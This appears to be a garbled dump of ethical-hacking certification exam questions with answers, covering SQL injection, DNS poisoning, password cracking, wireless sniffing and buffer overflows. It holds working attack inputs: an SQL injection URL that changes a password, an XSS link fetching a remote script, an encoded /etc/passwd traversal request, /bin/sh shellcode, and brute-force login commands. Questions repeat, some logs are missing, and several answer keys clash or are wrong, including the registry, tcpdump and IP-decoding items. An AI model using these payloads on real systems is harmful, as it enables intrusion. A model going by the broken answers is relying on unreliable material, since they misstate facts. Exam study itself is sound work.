This is a typical Unicode attack. By configuring your IDS to trigger on strange Unicode requests, you can protect your web-server from this kind of attack.
Steven the hacker realizes the network administrator of Acme Corporation is using syskey in
Windows 2000 Server to protect his resources in the organization. Syskey independently encrypts
the hashes so that physical access to the server, tapes, or ERDs is only first step to cracking the passwords. Steven must break through the encryption used by syskey before he can attempt to use brute force dictionary attacks on the hashes. Steven runs a program called "SysCracker"
targeting the Windows 2000 Server machine in attempting to crack the hash used by Syskey. He needs to configure the encryption level before he can launch the attack. How many bits does
Syskey use for encryption?
A. 64-bit encryption
B. 128-bit encryption
C. 40-bit encryption
D. 256-bit encryption
B. 128-bit encryption

SYSKEY is a utility that encrypts the hashed password information in a SAM database using a 128-bit encryption key.
A simple compiler technique used by programmers is to add a terminator 'canary word' containing four letters NULL (0x00), CR (0x0d), LF (0x0a) and EOF (0xff) so that most string operations are
terminated. If the canary word has been altered when the function returns, and the program responds by emitting an intruder alert into syslog, and then halts what does it indicate?
A. A buffer overflow attack has been attempted
B. A buffer overflow attack has already occurred
C. The system has crashed
D. An intrusion detection system has been triggered
E. A firewall has been breached and this is logged
A. A buffer overflow attack has been attempted.

Terminator canaries are based on the observation that most buffer overflows and stack smash attacks are based on certain string operations which end at terminators. The reaction to this observation is that the canaries are built of NULL terminators, CR, LF and -1. The undesirable result is that the canary is then known.
Ivan is auditing a corporate website. Using Winhex, he alters a cookie as shown below.
Before Alteration: Cookie: lang=en-us; ADMIN=no; y=1 ; time=10:30GMT ;
After Alteration: Cookie: lang=en-us; ADMIN=yes; y=1 ; time=12:30GMT ;
What attack is being depicted here?
A. Cookie Stealing
B. Parameter Manipulation
C. Session Hijacking
D. Cross Site Scripting
B. Parameter manipulation

Cookies are the preferred method to maintain state in the stateless HTTP protocol. They are, however, also used as a convenient mechanism to store user preferences and other data including session tokens. Both persistent and non-persistent cookies, secure or insecure, can be modified by the client and sent to the server with URL requests. Therefore, any malicious user can modify cookie content to his advantage. There is a popular misconception that non-persistent cookies cannot be modified, but this is not true--tools like Winhex are freely available. SSL also only protects the cookie in transit.
Given the follow extract from the snort log on a honey pot, what do you infer from the attack?

A. A new user id was created
B. The exploit was not successful
C. The exploit was successful
D. A new port was opened.
B. The exploit was not successful.

The attacker submits a PASS to the honeypot and receives a login incorrect before disconnecting.
You receive an e-mail with the following text message.
"Microsoft and AOL today warned all customers that a new, highly dangerous virus has been discovered which will erase all your files at midnight. If there's a file called hidserv.exe on your computer, you have been infected and your computer is now running a hidden server that allows
hackers to access your computer. Delete the file immediately. Please also pass this message to
all your friends and colleagues as soon as possible."
You launch your antivirus software and scan the suspicious looking file hidserv.exe located in
c:\windows directory and the AV comes out clean meaning the file is not infected. You view the file signature and confirm that it is a legitimate Windows system file "Human Interface Device Service."
What category of virus is this?
A. Spooky Virus
B. Virus hoax
C. Polymorphic Virus
D. Stealth Virus
B. Virus hoax.
Eve is spending her day scanning the library computers. She notices that Alice is using a computer whose port 445 is active and listening. Eve uses the ENUM tool to enumerate Alice's
machine. From the command prompt, she types the following command.
For /f okens=1 %%a in (hackfile.txt) do net use * \\10.1.2.3\c$ /user:dministrator?%%a
What is Eve trying to do?

A. Eve is trying to carry out a password crack for user Administrator
B. Eve is trying to escalate privilege of the null user to that of Administrator
C. Eve is trying to connect asan user with Administrator privileges
D. Eve is trying to enumerate all users with Administrative privileges
A. Eve is trying to carry out a password crack for user Administrator.

Eve is trying to get a successful login using the name Administrator and passwords from the file hackfile.txt
Joseph is the Web site administrator for the Mason Insurance in New York, whose primary website is located at http://www.masonins.com/. Joseph uses his laptop computer regularly for website
administration. One night, an associate notifies Joseph that the main Mason Insurance web site had been vandalized! In place of the legitimate content, the hacker had left a message ''H@cker Mess@ge: Y0u @re De@d! Fre@ks! ''
Joseph surfed to the Web site from his office, which was directly connected to Mason Insurance's internal network using his laptop. However, no changes were apparent to him and he could see the legitimate content. Joseph was puzzled when another employee called in to report the defaced website. Joseph logged off the company's internal LAN and accessed the company Web site using his dialup ISP connection. He browsed to http://www.masonins.com/ and saw the following on the web page:
H@ckermailto:H@cker Mess@gemailto:Mess@ge: Y0u @re De@dmailto:De@d!
Fre@ksmailto:Fre@ks!
After seeing the defaced Web site, he disconnected his dial-up line, reconnected to the internal
network, and used Secure Shell (SSH) to log in directly to the Web server. He ran Tripwire against
the entire Web site, and found that every system file and all the Web content on the server were
intact.
How did the attacker accomplish this hack?
A. ARP spoofing
B. Routing table injection
C. SQL injection
D. DNS poisoning
D. DNS Poisoning

External calls for the Web site has been redirected to another server by a successful DNS
poisoning.
Stephanie works as a records clerk in a large office building in downtown Chicago.On Monday,
she went to a mandatory security awareness class (Security5) put on by her company's IT
department.During the class, the IT department informed all employees that everyone's Internet
activity was thenceforth going to be monitored.
Stephanie is worried that her Internet activity might give her supervisor reason to write her up, or
worse get her fired.Stephanie's daily work duties only consume about four hours of her time, so
she usually spends the rest of the day surfing the web. Stephanie really enjoys surfing the Internet
but definitely does not want to get fired for it.
What should Stephanie use so that she does not get in trouble for surfing the Internet?
A. Stealth Firefox
B. Cookie Disabler
C. Stealth Anonymizer
D. Stealth IE
C. Stealth Anonymizer
Identify SQL injection attack from the HTTP requests shown below:
A. http://www.victim.com/example?accountnumber=67891&creditamount=999999999
B.
http://www.myserver.com/search.asp?lname=smith%27%3bupdate%20usertable%20set%20pass
wd%3d%27hAx0r%27%3b--%00
C.
http://www.myserver.com/script.php?mydata=%3cscript%20src=%22http%3a%2f%2fwww.yourser
ver.c0m%2fbadscript.js%22%3e%3c%2fscript%3e
D. http://www.xsecurity.com/cgiin/bad.cgi?foo=..%fc%80%80%80%80%af../bin/ls%20-al
B. http://www.myserver.com/search.asp?lname=smith%27%3bupdate%20usertable%20set%20pass
wd%3d%27hAx0r%27%3b--%00

The correct answer contains the code to alter the usertable in order to change the
password for user smith to hAx0r
Liza has forgotten her password to an online bookstore. The web application asks her to key in her
email so that they can send her the password. Liza enters her email liza@yahoo.com'. The
application displays server error. What is wrong with the web application?
A. The email is not valid
B. User input is not sanitized
C. The ISP connection is not reliable
D. The web server may be down
B. User input is not sanitized

All input from web browsers, such as user data from HTML forms and cookies, must be stripped of
special characters and HTML tags as described in the following CERT advisories:
http://www.cert.org/advisories/CA-1997-25.html
http://www.cert.org/advisories/CA-2000-02.html
You are writing an antivirus bypassing Trojan using C++ code wrapped into chess.c to create an
executable file chess.exe. This Trojan when executed on the victim machine, scans the entire
system (
A. HKEY_LOCAL_SYSTEM\SOFTWARE\Microsoft\Windows\CurrentVersion\Auto
B. HKEY_LOCAL_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Start
C. HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Desktop
D. HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices
D. HKEY_CURRENT_USER\SOFTWARE\Microsoft|Windows|CurrentVersion|Desktop

HKEY_LOCAL_MACHINE would be the natural place for a registry entry that starts services when the MACHINE is rebooted
You are trying to break into a highly classified top-secret mainframe computer with highest security system in place at Merclyn Barley Bank located in Los Angeles. You know that conventional
hacking doesn't work in this case, because organizations such as banks are generally tight and secure when it comes to protecting their systems. In other words you are trying to penetrate an
otherwise impenetrable system.
How would you proceed?

A. Try to conduct Man-in-the-Middle (MiTM) attack and divert the network traffic going to the Merclyn Barley Bank's Webserver to that of your machine using DNS Cache Poisoning techniques
B. Look for "zero-day" exploits at various underground hacker websites in Russia and China
and buy the necessary exploits from these hackers and target the bank's network
C. Launch DDOS attacks against Merclyn Barley Bank's routers and firewall systems using 100,000 or more "zombies" and "bots"
D. Try to hang around the local pubs or restaurants near the bank, get talking to a poorly-paid or disgruntled employee, and offer them money if they'll abuse their access privileges by providing you with sensitive information
D. Try to hang around the local pubs or restaurants near the bank, get talking to a poorly-paid or disgruntled employee, and offer them money if they'll abuse their access privileges by providing you with sensitive information.
You come across a WiFi network in your neighborhood. You pull up your hardware WiFi sniffer
from your car and tune into 802.11a network to sniff the Wireless traffic for sensitive data. What
frequency will you tune the Wireless hardware device to?
A. 900MHz-2.462 GHz
B. 5.15-5.825 GHz
C. 2.323-2.462 GHz
D. 2.412-2.462 GHz
B. 5.15 - 5.825 GHz
Which programming language is NOT vulnerable to buffer overflow attacks?
A. Assembly Language
B. C++
C. ActiveX
D. Java
D. Java

Perl and Java have boundary checking, hence buffer overflows don't occur. On the other hand, Perl and Java don't offer access to the system that is as deep as some applications require.
SNMP is a protocol used to query hosts, servers, and devices about performance or health status
data. Hackers have used this protocol for a long time to gather great amount of information about
remote hosts. Which of the following features makes this possible?
A. It uses TCP as the underlying protocol
B. It uses a community string sent as clear text
C. It is susceptible to sniffing
D. It is used by ALL devices on the market
B. It uses a community string sent as clear text

SNMP uses UDP, not TCP, and even though many devices uses SNMP not ALL devices use it
and it can be disabled on most of the devices that does use it. However SNMP is susceptible to sniffing and the community string (which can be said acts as a password) is sent in clear text
Fingerprinting an Operating System helps a cracker because:
A. It doesn't depend on the patches that have been applied to fix existing security holes
B. It opens a security-delayed window based on the port being scanned
C. It informs the cracker of which vulnerabilities he may be able to exploit on your system
D. It defines exactly what software you have installed
C. It informs the cracker what vulnerabilities he may be able to exploit on your system.

When a cracker knows what OS and services you use, it allows him to target his exploits to your system, saving time and decreasing the chances of detection.
A program that defends against a port scanner will attempt to:
A. Log a violation and recommend use of security-auditing tools
B. Update a firewall rule in real time to prevent the port scan from being completed
C. Sends back bogus data to the port scanner
D. Limit access by the scanning system to publicly available ports only
B. Update a firewall rule in real time to prevent the port scan from being completed.
Statistics from cert.org and other leading security organizations have clearly shown a steady
increase in the number of hacking incidents against companies. What do you think is the main
reason we have seen such a huge increase in hacking attempts over the past years?
A. Increase in processing power
B. It is getting harder to hack and more challenging for non technical people
C. The ease of getting hacker tools on the Internet
D. New TCPIP stack features are constantly being added
C. The ease of getting hacker tools on teh Interwebz.

Script kiddez!
Gerald, the Systems Administrator for Hyped Enterprises, has just discovered that his network has
been breached by an outside attacker.After performing routine maintenance on his servers, he
discovers numerous remote tools were installed that no one claims to have knowledge of in his
department.
Gerald logs onto the management console for his IDS and discovers an unknown IP address that
scanned his network constantly for a week and was able to access his network through a highlevel
port that was not closed.Gerald traces the IP address he found in the IDS log to a proxy
server in Brazil.
Gerald calls the company that owns the proxy server and after searching through their logs, they
trace the source to another proxy server in Switzerland.Gerald calls the company in Switzerland
that owns the proxy server and after scanning through the logs again, they trace the source back
to a proxy server in China.
What tool has Gerald's attacker used to cover their tracks?
A. IAS
B. Cheops
C. ISA
D. Tor
D. Tor

Tor is a network of virtual tunnels that allows people and groups to improve their privacy and
security on the Internet. It also enables software developers to create new communication tools
with built-in privacy features. It provides the foundation for a range of applications that allow
organizations and individuals to share information over public networks without compromising their
privacy. Individuals can use it to keep remote Websites from tracking them and their family
members. They can also use it to connect to resources such as news sites or instant messaging
services that are blocked by their local Internet service providers (ISPs).
You want to carry out session hijacking on a remote server. The server and the client are
communicating via TCP after a successful TCP three-way handshake. The server has just
received packet #120 from the client. The client has a receive window of 200 and the server has a
receive window of 250. What is the range of packet sequence numbers that would be accepted by
the server?
A. 121-371
B. 120-370
C. 200-250
D. 121-231
E. 120-321
A. 121-371.

Package number 120 has already been received by the server, and the window is 250 packets, so any package number from 121 (next in sequence) to 371 (121+250)
Henry is an attacker and wants to gain control of a system and use it to flood a target system with
requests, so as to prevent legitimate users from gaining access. What type of attack is Henry
using?
A. Henry is using a denial of service attack which is a valid threat used by an attacker
B. Henry uses poorly designed input validation routines to create or alter commands to gain
access to unintended data or execute commands
C. Henry is executing commands or viewing data outside the intended target path
D. Henry is taking advantage of an incorrect configuration that leads to access with higher-thanexpected
privilege
A. Henry is using a DoS attack.

Henry's intent is to perform a DoS attack against his target, or possibly a DDoS. He uses systems other than his own to perform the attack to cover his tracks, and to get more punch in the DoS.
Steve scans the network for SNMP enabled devices. Which port number should Steve scan?

A. 161
B. 169
C. 150
D. 69
A. 161.

The default port for SNMP is 161. Port 69 us used for TFTP, 150 is used for SQL-NET, and 169 is for SEND.
The GET method should never be used when sensitive data such as credit card is being sent to a
CGI program. This is because any GET command will appear in the URL, and will be logged by
any servers. For example, let's say that you've entered your credit card information into a form that
uses the GET method. The URL may appear like this:
https://www.xsecurity-bank.com/creditcard.asp?cardnumber=453453433532234
The GET method appends the credit card number to the URL. This means that anyone with
access to a server log will be able to obtain this information.
How would you protect from this type of attack?

A. Replace the GET with POST method when sending data
B. Encrypt the data before you send using GET method
C. Never include sensitive information in a script
D. Use HTTPS SSLv3 to send the data instead of plain HTTPS
A. Replace the GET with POST method when sending data.

If the method is "get," the user agent takes the value of action, appends a ? to it, then appends the form data set, encoded using the application/x-www-form-urlencoded content type. The user agent then traverses the link to this URL. If the method is "post" the user agent conducts an HTTP post transaction using the value of the action attribute and a message created according to the content type specified by the enctype attribute.
What is the command used to create a binary log file using tcpdump?

A. tcpdump -r log
B. tcpdump -l /var/log/
C. tcpdump -vde log
D. tcpdump -w ./log
D. tcpdump - ./log
Jonathan being a keen administrator has followed all of the best practices he could find on
securing his Windows Server. He renamed the Administrator account to a new name that cannot
be easily guessed but there remain people who attempt to compromise his newly renamed
administrator account. How can a remote attacker decipher the name of the administrator account
if it has been renamed?
A. The attacker used the sid2user program
B. The attacker guessed the new name
C. The attacker used the user2sid program
D. The attacker used NMAP with the V switch
C. The attacker used the user2sid program.

User2sid.exe can retrieve a SID from the SAM (Security Accounts Manager) from the local or a
remote machine Sid2user.exe can then be used to retrieve the names of all the user accounts and
more. These utilities do not exploit a bug but call the functions LookupAccountName and
LookupAccountSid respectively. What is more these can be called against a remote machine without providing logon credentials save those needed for a null session connection.
Take a look at the following attack on a Web Server using obstructed URL:
http://www.example.com/script.ext?template=%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63
%2f%70%61%73%73%77%64

This request is made up of:
.%2e%2e%2f%2e%2e%2f%2e%2e%2f = ../../../
.%65%74%63 = etc
.%2f = /
.%70%61%73%73%77%64 = passwd
.
How would you protect from these attacks?

A. Configure the Web Server to deny requests involving "hex encoded" characters
B. Use SSL authentication on Web Servers
C. Create rules in IDS to alert on strange Unicode requests
D. Enable Active Scripts Detection at the firewall and routers
C. Create rules in IDS to alert on strange Unicode requests.

This is a typical Unicode atttack. By configuring you IDS to trigger on strange Unicode requests, you can protect your web-server from this type of attacks.
Steven the hacker realizes the network administrator of Acme Corporation is using syskey in
Windows 2000 Server to protect his resources in the organization. Syskey independently encrypts
the hashes so that physical access to the server, tapes, or ERDs is only first step to cracking the
passwords. Steven must break through the encryption used by syskey before he can attempt to
use brute force dictionary attacks on the hashes. Steven runs a program called "SysCracker"
targeting the Windows 2000 Server machine in attempting to crack the hash used by Syskey. He
needs to configure the encryption level before he can launch the attack. How many bits does
Syskey use for encryption?
A. 64-bit encryption
B. 128-bit encryption
C. 40-bit encryption
D. 256-bit encryption
B. 128 bit encryption.

SYSKEY is a utility that encrypts the hashed password information in a SAM database using a 128-bit encryption key.
A simple compiler technique used by programmers is to add a terminator 'canary word' containing
four letters NULL (0x00), CR (0x0d), LF (0x0a) and EOF (0xff) so that most string operations are
terminated. If the canary word has been altered when the function returns, and the program
responds by emitting an intruder alert into syslog, and then halts what does it indicate?
A. A buffer overflow attack has been attempted
B. A buffer overflow attack has already occurred
C. The system has crashed
D. An intrusion detection system has been triggered
E. A firewall has been breached and this is logged
A. A buffer overflow attack has been attempted.

Terminator canaries are based on the observation that most buffer overflows and stack smash attacks are based on certain string operations which end at terminators. The reaction to this observation is that the canaries are built of NULL terminators, CR, LF and -1. The undesirable result is that the canary is known.
Ivan is auditing a corporate website. Using Winhex, he alters a cookie as shown below.
Before Alteration: Cookie: lang=en-us; ADMIN=no; y=1 ; time=10:30GMT ;
After Alteration: Cookie: lang=en-us; ADMIN=yes; y=1 ; time=12:30GMT ;
What attack is being depicted here?
A. Cookie Stealing
B. Parameter Manipulation
C. Session Hijacking
D. Cross Site Scripting
B. Parameter manipulation

Cookies are the preferred method to maintain state in the stateless HTTP protocol. They are however also used as a convenient mechanism to store user preferences and other data including session tokens. Both persistent and non-persistent cookies, secure or insecure, cna be modified by the client and sent to the server with URL requests. Therefore, any malicious user can modify cookie content to his advantage.
Given the following extract from the snort log on a honeypot, what do you infer from the attack?

A. A new user id was created
B. The exploit was not successful
C. The exploit was successful
D. A new port was opened.
B. The attacker submits a PASS to the honeypot, and receives a login incorrect before disconnecting.
You are programming a buffer overflow exploit and you want to create a NOP sled of 200 bytes in the program exploit.c
char shellcode[] =
"\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0"
"\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d"
"\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73"
"\x68";
What is the hexadecimal value of NOP instruction?
A. 0x60
B. 0x70
C. 0x80
D. 0x90
D. 0x90
Finding tools to run dictionary and brute forcing attacks against FTP and Web servers is an easy
task for hackers. They use tools such as arhontus or brutus to break into remote servers.
CEH# ./rpa
Remote Password Assassin V 1.0
Roses Labs / w00w00
Usage: ./rpa <host> (options)
Options:
-l : Login file to use.
-s : Use the same login.
-c : Password file to use.
-r : Attack FlowPoint Router.
-t : Attack Telnet Port.
-f : Attack FTP Port.
-p : Attack POP Port.
CEH# ./rpa 10.0.0.34 -t -f -c passwords.txt -s linksys
A command such as this, will attack a given 10.0.0.34 FTP and Telnet servers simultaneously with
a list of passwords and a single login name: linksys. Many FTP-specific password-guessing tools
are also available from major security sites.
What defensive measures will you take to protect your network from these attacks?
A. Never leave a default password
B. Never use a password related to your hobbies, pets, relatives, or date of birth.
C. Never use a password that can be found in a dictionary
D. Use a word that has more than 21 characters from a dictionary as the password
E. Never use a password related to the hostname, domain name, or anything else that can be found with whois
A. Never leave a default password
B. Never use a password related to your hobbies, pets, relatives, or date of birth.
C. Never use a password that can be found in a dictionary
E. Never use a password related to the hostname, domain name, or anything else that can be found with whois
Jimmy, an attacker, knows that he can take advantage of poorly designed input validation routines
to create or alter SQL commands to gain access to private data or execute commands in the database. What technique does Jimmy use to compromise a database?
A. Jimmy can utilize an incorrect configuration that leads to access with higher-than-expected
privilege of the database
B. Jimmy can submit user input that executes an operating system command to compromise a
target system
C. Jimmy can utilize this particular database threat that is an SQL injection technique to penetrate
a target system
D. Jimmy can gain control of system to flood the target system with requests, preventing legitimate
users from gaining access
C. Jimmy can utilize this particular database threat that is an SQL injection technique to penetrate a target system.

SQL injection is a security vulnerability that occurs in the database layer of an application. The
vulnerability is present when user input is either incorrectly filtered for string literal escape
characters embedded in SQL statements or user input is not strongly typed and thereby
unexpectedly executed. It is in fact an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another.
Windows LAN Manager (LM) hashes are known to be weak. Select all of the following that are
weaknesses of LM?
A. Hashes are sent in clear over the network
B. Effective length is 7 characters
C. Makes use of only 32-bit encryption
D. Converts password to uppercase
A. Hashes are sent in clear over the network
B. Effective length is 7 characters
D. Converts password to uppercase

The LM hash is computed as follows. 1. The user's password as an OEM string is converted to
uppercase. 2. This password is either null-padded or truncated to 14 bytes. 3. The "fixed-length"
password is split into two 7-byte halves. 4. These values are used to create two DES keys, one
from each 7-byte half. 5. Each of these keys is used to DES-encrypt the constant ASCII string "
KGS!@#$% ", resulting in two 8-byte ciphertext values. 6. These two ciphertext values are
concatenated to form a 16-byte value, which is the LM hash.
The hashes themselves are sent in clear text over the network instead of sending the password in clear text.
Which of the following represents the initial two commands that an IRC client sends to join an IRC
network?
A. LOGIN, USER
B. USER, PASS
C. USER, NICK
D. LOGIN, NICK
C. USER, NICK

A "PASS" command is not requred for either client or server connection to be registered, but it must precede the server message or the latter of the NICK/USER combination. (RFC 1459)
You are the senior security analyst for Hammerstreet Inc. located in Florida. Hammerstreet's
primary product line revolves around high tech weapons developed for the US Army. For this
reason, your position as the head of logical security is vital in ensuring that no corporate secrets
are leaked. You are in the process of purchasing an IPS device for the network, so currently you
only have an older IDS appliance sitting on the network.
On Monday morning when you get into work, you are alerted by your IDS that an outside IP is
scanning numerous ports on your network. You are then alerted by the IDS that it is getting
flooded by malformed packets to some commonly used ports such as ports 80, 135, 445, and 53.
You logon to the IDS' management console and run TCP dump to a text file for a time range of 10
minutes. You open the file initially but it is very difficult to read. You eed a utility that can group all
the TCP packets in the file by their timestamps, to get a closer look at how much data is being
sent to your network in a given amount of time.
What utility could you use to examine the TCP dump file closer and make it more readable?

A. Tcpslice
B. WinPcap
C. TCPdump
D. IDSwakeup
A. Tcpslice
The FIN flag is set and sent from host A to host B when host A has no more data to transmit
(Closing a TCP connection). This flag releases the connection resources. However, host A can
continue to receive data as long as the SYN sequence numbers of transmitted packets from host
B are lower than the packet segment containing the set FIN flag.
A. True
B. False
A. True

For sequence number purposes, the SYN is considered to occur before the first actual data octet of the segment in which it occurs, while the FIN is considered to occur after the last actual data octet in a segment in which it occurred. So, packets received out of order will still be accepted.
Steven works as a security consultant and frequently performs penetration tests for Fortune 500
companies.Steven runs external and internal tests and then creates reports to show the
companies where their weak areas are.Steven always signs a non-disclosure agreement before
performing his tests.What would Steven be considered?
A. Blackhat Hacker
B. Whitehat Hacker
C. Grayhat Hacker
D. Bluehat Hacker
B. Whitehat hacker.
What is the purpose of firewalking?
A. It's a technique used to discover what rules are configured on a gateway
B. It's a technique used to discover interface in promiscuous mode
C. It's a technique used to map routers on a network link
D. It's a technique used to discover Wireless network on foot
A. It's a technique used to discover what rules are configured on a gateway.

Firewalking uses a traceroute-like IP packet analysis to determine whether or not a particular packet can pass from the attacker's host to a destination host through a packet-filtering device. This technique can be used to map "open" or "pass-through" ports on a gateway. Moreover, it can determine whether packets with various control information can pass through a given gateway.
Daryl is a network administrator working for Dayton Technologies. Since Daryl's background is in
web application development, many of the programs and applications his company uses are webbased.
Daryl sets up a simple forms-based logon screen for all the applications he creates, so
they are secure.
The problem Daryl is having, is that his users are forgetting their passwords quite often and
sometimes he does not have the time to get into his applications and change the passwords for
them. Daryl wants a tool or program that can monitor web-based passwords and notify him when a password has been changed so he can use that tool whenever a user calls him and he can give them their password right then.
What tool would work best for Daryl's needs?

A. WinHttrack
B. John the Ripper
C. L0phtCrack
D. Password Sniffer
D. Password Sniffer.

L0phtCrack is a PW auditing and recovery app (now called LC5), originally produced by Mudge from L0pht industries. It is used to test PW strength, and sometimes to recover lost MS Windows passwords.
John the Ripper is one of hte most popular password testing.breaking programs, as it combines a number of password crackers into one package, autodetects PW hash types, and includes a customizable cracker. It can be run against various encrypted password formats, including several crypt PW hash types.
WinHttrack is an offlien browser.
A PW sniffer would give Daryl the PWs when they are changed as it is a web-based authentication over a simple form.
It would be more correct to give the users new PWs instead of keeping a copy of the PWs in clear text.
How many bits encryption does SHA-1 use?
A. 256 bits
B. 160 bits
C. 128 bits
D. 64 bits
B. 160 bits

SHA-1 (as well as SHA-0) produces a 160 bit digest from a message with a maximum length of 261-1 bits and is based on principles similar to Rivest's in the design of the MD4 and MD5 algorithms.
You are having trouble obtaining accurate results while conducting a port scan against a target
network. You check for the presence of any security devices between you and the target system.
When both stealth and connect scans do not work, you decide to perform a NULL scan with
NMAP. The first few systems scanned shows all ports open. Which one of the following
statements is most probably true?
A. The systems have all ports open
B. The systems are running a host based IDS
C. The systems are Web Servers
D. The systems are running Windows
D. The systems are running Windows.

The null scan turns off all flags, creating a lack of TCP flags that should never occur in the real world. If the port is closed, a RST frame should be returned and a null scan to an open port results in no response. Unfortunately (as usual) Microsoft decided to completely ignore the standard and do things their won way... Thus, this scan type will not work against systems running Windows as they choose not to respond at all. This is a good way to distinguish that the system being scanned is running Windows.
Jeffery works at a large financial firm in Dallas, Texas as a securities analyst. Last week, the IT
department of his company installed a wireless network throughout the building. The problem is, is
that they are only going to make it available to upper management and the IT department.
Most employees don't have a problem with this since they have no need for wireless networking,
but Jeffery would really like to use wireless since he has a personal laptop that he works from as
much as he can.
Jeffery asks the IT manager if he could be allowed to use the wireless network but he is turned
down. Jeffery is not satisfied, so he brings his laptop in to work late one night and tries to get
access to the network. Jeffery uses the wireless utility on his laptop, but cannot see any wireless
networks available. fter about an hour of trying to figure it out, Jeffery cannot get on the company's
wireless network. Discouraged, Jeffery leaves the office and goes home.
The next day, Jeffery calls his friend who works with computers. His friend suggests that his IT
department might have turned off SSID broadcasting, and that is why he could not see any
wireless networks.
How would Jeffrey access the wireless network?
A. Jam the wireless signal by launching denial of service attack
B. Attempt to connect using wireless device default SSIDs
C. Run WEPCrack tool and brute force the SSID hashes
D. Sniff the wireless network and capture the SSID that is transmitted over the wire in plaintext

A. Jam the wireless signal by launching denial of service attack
B. Attempt to connect using wireless device default SSIDs
C. Run WEPCrack tool and brute force the SSID hashes
D. Sniff the wireless network and capture the SSID that is transmitted over the wire in plaintext
D. Sniff the wireless network and capture the SSID that is transmitted over the wire in plaintext.
Which of the following built-in C/C++ functions you should avoid to prevent your program from buffer overflow attacks?
A. strsock()
B. strcpy()
C. streadd()
D. strcat()
B. strcpy()
C. streadd()
D. strcat()

When hunting buffer overflows, the first thing to look for is functions which write into arrays without any way to know the amount of space available. If you get to define the function, you can pass a length parameter in, or ensure that every array you ever pass to it is at least as big as the hardcoded maximum amount it will write. If you're using a function someone else (like, say, the compiler vendor) has provided then avoiding functions like gets(), which take some amount of data over which you have no control and stuff it into arrays they can never know the size of, is a good start. Make sure that functions like the str ...() family which expect NUL-terminated strings actually
get them - store a '\0' in the last element of each array involved just before you call the function, if necessary. Strscock( ) is not a valid C/C++ function.
Ethernet switches can be adversely affected by rapidly bombarding them with spoofed ARP
responses. he port to MAC address table (CAM TABLE) overflows on the switch, and rather than
failing completely, moves into broadcast mode, then the hacker can sniff all of the packets on the
network.
Which of the following tool achieves this?
A. ./sniffof
B. ./dsniff
C. ./switchsnarf
D. ./macof
D. ./macof

macof floods the local network with random MAC addresses (causing some switches to fail open in repeating mode, facilitating sniffing.)
What does this symbol mean:

A. WPA encrypted access point
B. WEP encrypted access point
C. Open access point
D. Closed access point
C. Open access point.

This is a warchalking symbol for an open node (open circle) with the SSID tsunami, and the bandwidth is 2.0 Mb/s
On wireless networks, a SSID is used to identify the network. Why are SSID not considered to be
a good security mechanism to protect a wireless network?
A. The SSID is the same as the MAC address for all vendors
B. The SSID is only 32 bits in length
C. The SSID is to identify a station, not a network
D. The SSID is transmitted in clear text
D. The SSID is transmitted in clear text.

The SSID is constructed to identify a network. It is not the same as a MAC address, and SSIDs conssit of a maximum of 32 alphanumeric characters.
You are trying to compromise a Linux machine and steal the password hashes for cracking with
password brute forcing program. Where is the password file kept in Linux?
A. /etc/passwd
B. /bin/shadow
C. /bin/password
D. /etc/shadow
D. /etc/shadow

The /etc/shadow file stores actual passwords in encrypted format for user accounts iwht additional properties related to user passwords. I.e. it stores secure user account information. All fields are separated by a colon (:). It contains one entry per line for each user listed in /etc/passwd file.
You are the security administrator for a large online auction company based out of Los
Angeles.After getting your ENSA CERTIFICATION last year, you have steadily been fortifying your
network's security including training, OS hardening, and network security.One of the last things
you just changed for security reasons was to modify all the built-in administrator accounts on the
local computers of PCs and in Active Directory.After thorough testing, you found that no services
or programs were affected by the name changes.
Your company undergoes an outside security audit by a consulting company, and they said that
even though all the administrator account names were changed, the accounts could still be used
by a clever hacker to gain unauthorized access.You argue with the auditors and say that is not
possible, so they use a tool and show you how easy it is to utilize the administrator account even
though its name was changed.
What tool did the auditors use?
A. Sid2user
B. User2sid
C. Fingerprint
D. GetAcct
A.. Sid2user

User2Sid.exe can retrieve a SID from the SAM from the local or a remote machine. Sid2User.exe can then be used to retrieve the names of all the user accounts and more.
In order to attack a wireless network, you put up an access point and override the signal of the real
access point. As users send authentication data, you are able to capture it. What kind of attack is
this?
A. WEP attack
B. Drive by hacking
C. Unauthorized access point attack
D. Rogue access point attack
D. Rogue Access Point attack.

The definition of a rogue access point is:
1) A wireless access point installed by an employee without the consent of the IT department. Withou the proper security configuration, users have exposed their company's network to the outside world. 2) An access point set up by an attacker outside a facility with a wireless network. Also called an "evil twin" the rogue access point picks up beacons (signals that advertise its presence) from the company's legitimate access point, and transmits identical beacons, which some client machines inside the building associate with.
A distributed port scan operates by:
A. Using denial-of-service software against a range of TCP ports
B. Having multiple computers each scan a small number of ports, then correlating the results
C. Blocking access to the targeted host by each of the distributed scanning clients
D. Blocking access to the scanning clients by the targeted host
B. Having multiple computers each scan a small number of ports, then correlating the results.
You are the security administrator for a large network. You want to prevent attackers from running
any sort of traceroute into your DMZ and discovering the internal structure of publicly accessible
areas of the network. How can you achieve this?
A. There is no way to completely block tracerouting into this area
B. Block ICMP at the firewall
C. Block TCP at the firewall
D. Block UDP at the firewall
A. There is no way to completely block tracerouting into this area.

If you create rules that prevent attackers from performing tracerouts into your DMZ, then you'll also prevent anyone from accessing the DMZ from outside the company network, and in that case, it's not a DMZ that you have.
You receive an e-mail with the below message:
Hello Steve,
We are having technical difficulty in restoring user database records after the recent blackout.
Your account data is corrupted. Please logon on to SuperEmailServices.com and change your
password.
http://www.superemailservices.com%40c3405906949/support/logon.htm
If you do not reset your password within 7 days, your account will be permanently disabled locking you out from using our e-mail services.
Sincerely,
Technical Support
uperEmailServices

From this e-mail you suspect that some hacker sent this message since you have been using their e-mail services for the last 2 years and they never have sent out an e-mail such as this. You also observe the URL in the message and want to confirm your suspicion about 3405906949, which looks like a base10 number. You enter the following at the Windows 2003 command prompt:
ping 3405906949
You get a response with a valid IP address. What is the obstructed IP address in the e-mail URL?
A. 199.23.43.4
B. 203.2.4.5
C. 192.34.5.9
D. 10.0.3.4
A. 199.23.43.4
B. 203.2.4.5

